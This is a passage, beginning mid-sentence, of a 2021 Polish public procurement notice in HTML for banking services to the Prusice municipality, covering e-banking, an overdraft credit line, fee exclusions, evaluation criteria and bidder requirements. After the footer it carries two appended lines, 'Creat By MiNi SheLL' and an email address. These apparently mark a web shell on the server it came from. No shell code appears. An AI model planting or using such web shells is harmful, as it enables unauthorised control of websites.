rachunkiem złoży odmienną dyspozycję, wyłącznie w przypadku, gdy oprocentowanie lokat będzie wyższe niż oprocentowanie środków na rachunku bieżącym – o ile takie produkty są w ofercie banku..5.Zapewnienie elektronicznego systemu obsługi bankowości elektronicznej na 29 stanowiskach oraz jego wdrożenie w standardzie zapewniającym pełne bezpieczeństwo zgodne z przepisami prawa, w zakresie bankowej obsługi finansowej, jednolitego dla rachunków bankowych wszystkich jednostek organizacyjnych Gminy Prusice, przekazywanie i instalowanie wersji aktualizacyjnych w okresie trwania umowy oraz świadczenie serwisu systemu bankowości elektronicznej a)Obsługę systemu bankowości elektronicznej na platformie internetowej, b)	Dostęp do usług bankowości elektronicznej 24 godziny w każdym dniu roboczym, c)Dostęp do usług bankowości elektronicznej zabezpieczony chronionymi hasłami, d)Dokonywanie operacji w czasie rzeczywistym tj. w momencie zatwierdzenia do realizacji e)Możliwość wcześniejszego przygotowania i wysłania zleceń w terminie wcześniejszym niż termin realizacji, f)Możliwość łączenia dowolnej liczby pojedynczych przelewów bankowych w grupy pozwalające na złożenie na nich akceptacji przez osoby upoważnione, g)Przeszukiwanie zbioru wszystkich operacji na wszystkich rachunkach wg rodzaju operacji, nazwy kontrahenta, daty, okresu, kwoty i innych kryteriów możliwych do wyodrębnienia w zbiorze operacji, h)wywołanie dowolnej operacji wg ww. kryteriów, i)Generowanie (wydruk) wyciągów bankowych oraz potwierdzeń przelewów zawierających pełną informacje o dacie i godzinie operacji, wraz z aktualnym oprocentowaniem j)Przechowywanie przelewów i wyciągów w archiwum systemu, k)W razie awarii naprawa systemu w dni robocze do 24 godzin od jej zgłoszenia, l)Bank umożliwi realizacje przelewów w formie papierowej na formularzu standardowym w przypadku braku dostępu (awarii) do systemu bankowości elektronicznej lub innych uzasadnionych przyczyn. m)Wykonawca zapewni przeszkolenie wskazanych przez Zamawiającego pracowników w zakresie obsługi systemu bankowości elektronicznej oraz zapewni instalację (uruchomienie) stanowisk bankowości elektronicznej oraz poprawne działanie oprogramowania bankowości elektronicznej na stanowiskach komputerowych wskazanych przez Zamawiającego, zgodnie z ustalonym harmonogramem prac.6.Uruchomienie kredytu w rachunku bieżącym Gminy Prusice a)Gotowość do udzielenia kredytu krótkoterminowego w rachunku bieżącym Gminy, który zostanie przeznaczony na pokrycie występującego w ciągu roku przejściowego deficytu budżetu Gminy do wysokości 3 000 000,00 zł. b)Maksymalną wysokość kredytu określa na dany rok budżetowy uchwała Rady Miejskiej w Prusicach w sprawie uchwały budżetowej, c)Kredyt będzie miał charakter odnawialny w każdym roku budżetowym, każdorazowo będzie uruchamiany po przekazaniu Wykonawcy stosownej uchwały Rady Miejskiej w Prusicach na dany rok budżetowy oraz podpisaniu umowy o kredyt w rachunku bieżącym. Wykorzystanie kredytu będzie następowało poprzez obciążenie rachunku bieżącego Gminy. d)Każdorazowy wpływ na rachunek bieżący będzie automatycznie zmniejszał saldo kredytowe, a tym samym umożliwi Zamawiającemu ponowne zadłużenie do wysokości określonej w umowie kredytu w rachunku bieżącym. Wykonawca nie będzie pobierał prowizji i opłat od salda niewykorzystanej części kredytu. Zamawiający zapłaci odsetki od rzeczywistego zadłużenia. e)Zabezpieczeniem kredytu będzie weksel in blanco wraz z deklaracją wekslową. Zamawiający dopuszcza podpisania oświadczenia o poddaniu się egzekucji. Oprocentowanie kredytu będzie opierało się o stopę WIBOR 1 M pomniejszoną/powiększoną o zaoferowaną przez Wykonawcę stałą marżę. Zamawiający zastrzega sobie prawo do zwiększenia limitu kwoty kredytu do 50% zamówienia. f)	Termin spłaty kredytu będzie następował do dnia 31 grudnia każdego roku.7.W ramach świadczonej obsługi bankowej budżetu Gminy Prusice i jej jednostek organizacyjnych, Zamawiający nie dopuszcza możliwości pobierania przez Wykonawcę prowizji i opłat z niżej wskazanych tytułów: a)Otwieranie i zamykanie rachunków podstawowych i pomocniczych, b)Prowadzenie rachunków podstawowych i pomocniczych c)Za przyjmowanie wszystkich wpłat gotówkowych na rzecz Gminy Prusice d)Potwierdzenia sald na rachunkach bankowych e)	Zmiany karty wzorów podpisów f)Uruchomienia kredytu w rachunku bieżącym g)Od wykorzystanego kredytu i niewykorzystanej linii kredytowej w ramach przyznanego kredytu w rachunku bieżącym h)Instalacji, udostępnienia, uruchomienia, użytkowania systemu bankowości elektronicznej i aktualizacji w siedzibie zamawiającego i jednostek organizacyjnych pełnego oprogramowania związanego z tym systemem oraz przeszkolenia wskazanych pracowników, i)Od przelewów dokonanych przez zamawiającego pomiędzy rachunkami zamawiającego w banku prowadzącym obsługę bankową Zamawiającego j)Za możliwość przekazywania w formie elektronicznej dyspozycji wypłaty świadczeń beneficjentom bezpośrednio do kasy banku,k)Za zerowanie rachunków bieżących i pomocniczych zgodnie z dyspozycjami kierowników jednostek organizacyjnych Gminy polegające na przekazywaniu z dniem 31 grudnia każdego roku kwot pozostałych na rachunkach na wskazany rachunek Gminy Prusice l)Za przeksięgowanie skapitalizowanych odsetek od rachunków bankowych, zgodnie ze złożonymi dyspozycjami w tym zakresie, m)Za wydanie opinii i zaświadczeń bankowych, n)Za sporządzanie i udostępnianie wyciągów bankowych Gminy Prusice i jej jednostek organizacyjnych 8.W przypadku łączenia, przekształcania jednostek organizacyjnych Gminy Prusice lub powoływania nowych jednostek organizacyjnych Wykonawca zobowiązany jest do realizacji przedmiotowej umowy na warunkach zadeklarowanych w ofercie, 9.Jednostki organizacyjne Gminy Prusice ponosić będą koszty obsługi bankowej związane z ich działalnością niezależnie od Gminy Prusice. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66110000-4 - Usługi bankowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">66000000-0 - Usługi finansowe i ubezpieczeniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-06-01 do 2024-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający do porównania ofert przyjmie stosunek cen, wysokości oprocentowania środków na rachunku podstawowym i wysokości oprocentowania na rachunkach pomocniczych w tym depozytach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokość oprocentowania środków na rachunku podstawowym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wysokość oprocentowania środków na rachunkach pomocniczych w tym depozytowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:1.Spełniają warunek, posiadania zdolności do występowania w obrocie gospodarczym. Zamawiający nie precyzuje warunku i odstępuje od wymagania podmiotowych środków dowodowych w tym zakresie. 2. Spełniają warunek sytuacji ekonomicznej lub finansowej.Zamawiający nie precyzuje warunku i odstępuje od wymagania podmiotowych środków dowodowych w tym zakresie3. Spełnią warunek zdolności technicznej lub zawodowej.Zamawiający nie precyzuje warunku i odstępuje od wymagania podmiotowych środków dowodowych w tym zakresie.4.Spełniają warunek, posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów.Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada zezwolenie na prowadzenie działalności bankowej na terenie Polski, a także realizację usług objętych przedmiotem zamówienia, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz.U. z 2020 r. poz. 1896 ze zm.), a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe – inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo bankowe. W przypadku Banku Państwowego wystarczy podanie rocznika, numeru i pozycji właściwego Dziennika Ustaw zawierającego rozporządzenie o utworzeniu banku.Opis sposobu dokonywania oceny tego warunku - ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia, a w przypadku uznania oferty za najwyżej ocenioną po uprzednim wezwaniu na podstawie złożonych przez Wykonawcę dokumentów wymienionych w punkcie VII SIWZ, na zasadzie spełnia/nie spełnia.5. Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, do złożenia podmiotowych środków dowodowych wymienionych w punkcie VIII SWZ, aktualnych na dzień złożenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzeniu braku podstaw wykluczenia z udziału postepowania o udzielnie zamówienia publicznego żąda niżej wymienionych podmiotowych środków dowodowych:1) Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;b) Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni aktualnych na dzień złożonych podmiotowych środków dowodowych: a)	zezwolenie na prowadzenie działalności bankowej na terenie Polski, a także realizację usług objętych przedmiotem zamówienia, zgodnie z przepisami ustawy z dnia 29 sierpnia 1997 r. Prawo bankowe (Dz.U. z 2020 r. poz. 1896) a w przypadku określonym w art. 178 ust. 1 ustawy Prawo bankowe – inny dokument potwierdzający rozpoczęcie działalności przed dniem wejścia w życie ustawy, o której mowa w art. 193 ustawy Prawo bankowe. W przypadku Banku Państwowego wystarczy podanie rocznika, numeru i pozycji właściwego Dziennika Ustaw zawierającego rozporządzenie o utworzeniu banku.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Na podstawie art. 58 ustawy Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany do umowy w przypadku zaistnienia przesłanek w punkcie XXV SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-14 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie pod adresem https://prusice.ezamawiajcy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-14 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-04-19 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com